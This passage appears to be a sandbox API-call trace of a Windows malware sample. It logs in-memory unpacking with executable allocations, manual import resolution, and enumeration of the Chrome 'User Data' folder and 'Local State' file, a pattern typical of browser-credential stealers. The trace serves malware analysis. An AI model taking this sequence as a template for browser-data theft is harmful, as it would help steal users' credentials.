Size=0x1c) returned 0x6efc78 [0233.657] GetProcessHeap () returned 0x6b0000 [0233.657] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4a4) returned 0x717f38 [0233.657] GetProcessHeap () returned 0x6b0000 [0233.657] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x715b58 [0233.657] GetProcessHeap () returned 0x6b0000 [0233.657] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x7183e8 [0233.657] GetProcessHeap () returned 0x6b0000 [0233.657] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efca0 [0233.658] GetProcessHeap () returned 0x6b0000 [0233.658] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4dc) returned 0x718870 [0233.658] GetProcessHeap () returned 0x6b0000 [0233.658] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x715d68 [0233.658] GetProcessHeap () returned 0x6b0000 [0233.658] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x718d58 [0233.659] GetProcessHeap () returned 0x6b0000 [0233.659] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efcc8 [0233.659] GetProcessHeap () returned 0x6b0000 [0233.659] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4b8) returned 0x7191e0 [0233.659] GetProcessHeap () returned 0x6b0000 [0233.659] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x715840 [0233.659] GetProcessHeap () returned 0x6b0000 [0233.660] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x7196a0 [0233.660] GetProcessHeap () returned 0x6b0000 [0233.660] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efcf0 [0233.660] GetProcessHeap () returned 0x6b0000 [0233.660] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c0) returned 0x719b28 [0233.661] GetProcessHeap () returned 0x6b0000 [0233.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x715948 [0233.661] GetProcessHeap () returned 0x6b0000 [0233.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x719ff0 [0233.661] GetProcessHeap () returned 0x6b0000 [0233.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efd90 [0233.662] GetProcessHeap () returned 0x6b0000 [0233.662] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xf423f) returned 0xef91020 [0233.669] GetProcessHeap () returned 0x6b0000 [0233.669] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x20) returned 0x6efdb8 [0233.669] GetProcessHeap () returned 0x6b0000 [0233.670] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2f8) returned 0x6e93b0 [0233.670] VirtualAlloc (lpAddress=0x60900000, dwSize=0x911b0, flAllocationType=0x3000, flProtect=0x40) returned 0x60900000 [0234.277] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75600000 [0234.278] GetProcessHeap () returned 0x6b0000 [0234.278] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x40) returned 0x6ed0b0 [0234.278] GetProcAddress (hModule=0x75600000, lpProcName="AreFileApisANSI") returned 0x7561f300 [0234.278] GetProcAddress (hModule=0x75600000, lpProcName="CloseHandle") returned 0x75626630 [0234.278] GetProcAddress (hModule=0x75600000, lpProcName="CreateFileA") returned 0x75626880 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="CreateFileMappingA") returned 0x756179c0 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="CreateFileMappingW") returned 0x756199b0 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="CreateFileW") returned 0x75626890 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="CreateMutexW") returned 0x756266f0 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="DeleteCriticalSection") returned 0x77770e60 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="DeleteFileA") returned 0x756268b0 [0234.279] GetProcAddress (hModule=0x75600000, lpProcName="DeleteFileW") returned 0x756268c0 [0234.280] GetProcAddress (hModule=0x75600000, lpProcName="EnterCriticalSection") returned 0x7775f290 [0234.280] GetProcAddress (hModule=0x75600000, lpProcName="FlushFileBuffers") returned 0x756269b0 [0234.280] GetProcAddress (hModule=0x75600000, lpProcName="FormatMessageA") returned 0x7561f830 [0234.280] GetProcAddress (hModule=0x75600000, lpProcName="FormatMessageW") returned 0x75624f80 [0234.280] GetProcAddress (hModule=0x75600000, lpProcName="FreeLibrary") returned 0x75619f50 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetCurrentProcessId") returned 0x756123e0 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetDiskFreeSpaceA") returned 0x756269c0 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetDiskFreeSpaceW") returned 0x756269f0 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetFileAttributesA") returned 0x75626a20 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetFileAttributesExW") returned 0x75626a40 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetFileAttributesW") returned 0x75626a50 [0234.281] GetProcAddress (hModule=0x75600000, lpProcName="GetFileSize") returned 0x75626a70 [0234.282] GetProcAddress (hModule=0x75600000, lpProcName="GetFullPathNameA") returned 0x75626ad0 [0234.282] GetProcAddress (hModule=0x75600000, lpProcName="GetFullPathNameW") returned 0x75626ae0 [0234.282] GetProcAddress (hModule=0x75600000, lpProcName="GetLastError") returned 0x75613870 [0234.282] GetProcAddress (hModule=0x75600000, lpProcName="GetModuleHandleA") returned 0x756199f0 [0234.282] GetProcAddress (hModule=0x75600000, lpProcName="GetProcAddress") returned 0x756178b0 [0234.282] GetProcAddress (hModule=0x75600000, lpProcName="GetProcessHeap") returned 0x75617710 [0234.283] GetProcAddress (hModule=0x75600000, lpProcName="GetSystemInfo") returned 0x7561a0f0 [0234.283] GetProcAddress (hModule=0x75600000, lpProcName="GetSystemTime") returned 0x75624940 [0234.283] GetProcAddress (hModule=0x75600000, lpProcName="GetSystemTimeAsFileTime") returned 0x75617620 [0234.283] GetProcAddress (hModule=0x75600000, lpProcName="GetTempPathA") returned 0x75626b20 [0234.283] GetProcAddress (hModule=0x75600000, lpProcName="GetTempPathW") returned 0x75626b30 [0234.284] GetProcAddress (hModule=0x75600000, lpProcName="GetTickCount") returned 0x75625eb0 [0234.284] GetProcAddress (hModule=0x75600000, lpProcName="GetVersionExA") returned 0x7561a700 [0234.284] GetProcAddress (hModule=0x75600000, lpProcName="GetVersionExW") returned 0x7561aa80 [0234.284] GetProcAddress (hModule=0x75600000, lpProcName="HeapAlloc") returned 0x77752bd0 [0234.284] GetProcAddress (hModule=0x75600000, lpProcName="HeapCompact") returned 0x756412a0 [0234.285] GetProcAddress (hModule=0x75600000, lpProcName="HeapCreate") returned 0x7561a100 [0234.285] GetProcAddress (hModule=0x75600000, lpProcName="HeapDestroy") returned 0x75624c30 [0234.285] GetProcAddress (hModule=0x75600000, lpProcName="HeapFree") returned 0x75611ba0 [0234.285] GetProcAddress (hModule=0x75600000, lpProcName="HeapReAlloc") returned 0x7774efe0 [0234.285] GetProcAddress (hModule=0x75600000, lpProcName="HeapSize") returned 0x7774bb20 [0234.286] GetProcAddress (hModule=0x75600000, lpProcName="HeapValidate") returned 0x7561cf80 [0234.286] GetProcAddress (hModule=0x75600000, lpProcName="InitializeCriticalSection") returned 0x7777a200 [0234.286] GetProcAddress (hModule=0x75600000, lpProcName="InterlockedCompareExchange") returned 0x75623ff0 [0234.287] GetProcAddress (hModule=0x75600000, lpProcName="LeaveCriticalSection") returned 0x7775f210 [0234.287] GetProcAddress (hModule=0x75600000, lpProcName="LoadLibraryA") returned 0x75624bf0 [0234.287] GetProcAddress (hModule=0x75600000, lpProcName="LoadLibraryW") returned 0x7561a840 [0234.287] GetProcAddress (hModule=0x75600000, lpProcName="LocalFree") returned 0x756179a0 [0234.288] GetProcAddress (hModule=0x75600000, lpProcName="LockFile") returned 0x75626b80 [0234.288] GetProcAddress (hModule=0x75600000, lpProcName="LockFileEx") returned 0x75626b90 [0234.288] GetProcAddress (hModule=0x75600000, lpProcName="MapViewOfFile") returned 0x75618d60 [0234.288] GetProcAddress (hModule=0x75600000, lpProcName="MultiByteToWideChar") returned 0x75612ad0 [0234.289] GetProcAddress (hModule=0x75600000, lpProcName="OutputDebugStringA") returned 0x7561fde0 [0234.289] GetProcAddress (hModule=0x75600000, lpProcName="OutputDebugStringW") returned 0x756419a0 [0234.289] GetProcAddress (hModule=0x75600000, lpProcName="QueryPerformanceCounter") returned 0x756138a0 [0234.289] GetProcAddress (hModule=0x75600000, lpProcName="ReadFile") returned 0x75626bb0 [0234.289] GetProcAddress (hModule=0x75600000, lpProcName="SetEndOfFile") returned 0x75626c00 [0234.290] GetProcAddress (hModule=0x75600000, lpProcName="SetFilePointer") returned 0x75626c40 [0234.290] GetProcAddress (hModule=0x75600000, lpProcName="Sleep") returned 0x75617990 [0234.290] GetProcAddress (hModule=0x75600000, lpProcName="SystemTimeToFileTime") returned 0x75624c10 [0234.290] GetProcAddress (hModule=0x75600000, lpProcName="TlsGetValue") returned 0x75611b70 [0234.291] GetProcAddress (hModule=0x75600000, lpProcName="UnlockFile") returned 0x75626c80 [0234.291] GetProcAddress (hModule=0x75600000, lpProcName="UnlockFileEx") returned 0x75626c90 [0234.291] GetProcAddress (hModule=0x75600000, lpProcName="UnmapViewOfFile") returned 0x75619b20 [0234.291] GetProcAddress (hModule=0x75600000, lpProcName="VirtualProtect") returned 0x75617a50 [0234.292] GetProcAddress (hModule=0x75600000, lpProcName="VirtualQuery") returned 0x75617a90 [0234.292] GetProcAddress (hModule=0x75600000, lpProcName="WaitForSingleObject") returned 0x75626820 [0234.292] GetProcAddress (hModule=0x75600000, lpProcName="WideCharToMultiByte") returned 0x75613880 [0234.292] GetProcAddress (hModule=0x75600000, lpProcName="WriteFile") returned 0x75626ca0 [0234.292] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x748c0000 [0234.292] GetProcAddress (hModule=0x748c0000, lpProcName="__dllonexit") returned 0x74917250 [0234.292] GetProcAddress (hModule=0x748c0000, lpProcName="_errno") returned 0x748f5cd0 [0234.293] GetProcAddress (hModule=0x748c0000, lpProcName="_iob") returned 0x74971208 [0234.293] GetProcAddress (hModule=0x748c0000, lpProcName="_winmajor") returned 0x74974b98 [0234.293] GetProcAddress (hModule=0x748c0000, lpProcName="abort") returned 0x7491bb60 [0234.293] GetProcAddress (hModule=0x748c0000, lpProcName="calloc") returned 0x749076f0 [0234.293] GetProcAddress (hModule=0x748c0000, lpProcName="fflush") returned 0x749333d0 [0234.294] GetProcAddress (hModule=0x748c0000, lpProcName="free") returned 0x74907740 [0234.294] GetProcAddress (hModule=0x748c0000, lpProcName="fwrite") returned 0x74939810 [0234.294] GetProcAddress (hModule=0x748c0000, lpProcName="localtime") returned 0x7494ded0 [0234.294] GetProcAddress (hModule=0x748c0000, lpProcName="malloc") returned 0x74907900 [0234.294] GetProcAddress (hModule=0x748c0000, lpProcName="memcmp") returned 0x74948440 [0234.294] GetProcAddress (hModule=0x748c0000, lpProcName="memmove") returned 0x749488b0 [0234.295] GetProcAddress (hModule=0x748c0000, lpProcName="memset") returned 0x74948c80 [0234.295] GetProcAddress (hModule=0x748c0000, lpProcName="qsort") returned 0x7491c200 [0234.295] GetProcAddress (hModule=0x748c0000, lpProcName="realloc") returned 0x749079f0 [0234.295] GetProcAddress (hModule=0x748c0000, lpProcName="strcmp") returned 0x74948e60 [0234.296] GetProcAddress (hModule=0x748c0000, lpProcName="strncmp") returned 0x74949290 [0234.296] GetProcAddress (hModule=0x748c0000, lpProcName="vfprintf") returned 0x74935c40 [0234.296] VirtualProtect (in: lpAddress=0x60901000, dwSize=0x6cec0, flNewProtect=0x20, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.353] VirtualProtect (in: lpAddress=0x6096e000, dwSize=0xfb0, flNewProtect=0x4, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.354] VirtualProtect (in: lpAddress=0x6096f000, dwSize=0xad24, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.354] VirtualProtect (in: lpAddress=0x6097a000, dwSize=0x498, flNewProtect=0x4, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.354] VirtualProtect (in: lpAddress=0x6097b000, dwSize=0x1998, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.355] VirtualProtect (in: lpAddress=0x6097d000, dwSize=0xa4c, flNewProtect=0x4, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.355] VirtualProtect (in: lpAddress=0x6097e000, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.355] VirtualProtect (in: lpAddress=0x6097f000, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.356] VirtualProtect (in: lpAddress=0x60980000, dwSize=0x27fc, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.356] VirtualProtect (in: lpAddress=0x60983000, dwSize=0x160, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.356] VirtualProtect (in: lpAddress=0x60984000, dwSize=0x3c8, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.356] VirtualProtect (in: lpAddress=0x60985000, dwSize=0x64d, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.357] VirtualProtect (in: lpAddress=0x60986000, dwSize=0x4360, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.357] VirtualProtect (in: lpAddress=0x6098b000, dwSize=0xd84, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.357] VirtualProtect (in: lpAddress=0x6098c000, dwSize=0xb94, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.358] VirtualProtect (in: lpAddress=0x6098d000, dwSize=0x504, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.358] VirtualProtect (in: lpAddress=0x6098e000, dwSize=0x10d, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.358] VirtualProtect (in: lpAddress=0x6098f000, dwSize=0x19db, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.358] VirtualProtect (in: lpAddress=0x60991000, dwSize=0x1b0, flNewProtect=0x2, lpflOldProtect=0x1985d0 | out: lpflOldProtect=0x1985d0*=0x40) returned 1 [0234.368] malloc (_Size=0x80) returned 0x1fb8c00 [0234.445] __dllonexit () returned 0x609011d0 [0234.445] __dllonexit () returned 0x6096d420 [0234.445] GetProcessHeap () returned 0x6b0000 [0234.445] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e93b0 | out: hHeap=0x6b0000) returned 1 [0234.446] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.448] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" [0234.448] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" [0234.448] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0234.448] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\local state")) returned 0xffffffff [0234.450] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*") returned 61 [0234.450] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x5c0061, ftCreationTime.dwHighDateTime=0x6f004c, ftLastAccessTime.dwLowDateTime=0x610063, ftLastAccessTime.dwHighDateTime=0x20006c, ftLastWriteTime.dwLowDateTime=0x740053, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x65, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.470] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.470] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.470] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.470] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.471] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.471] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.471] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.471] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.471] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.471] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, 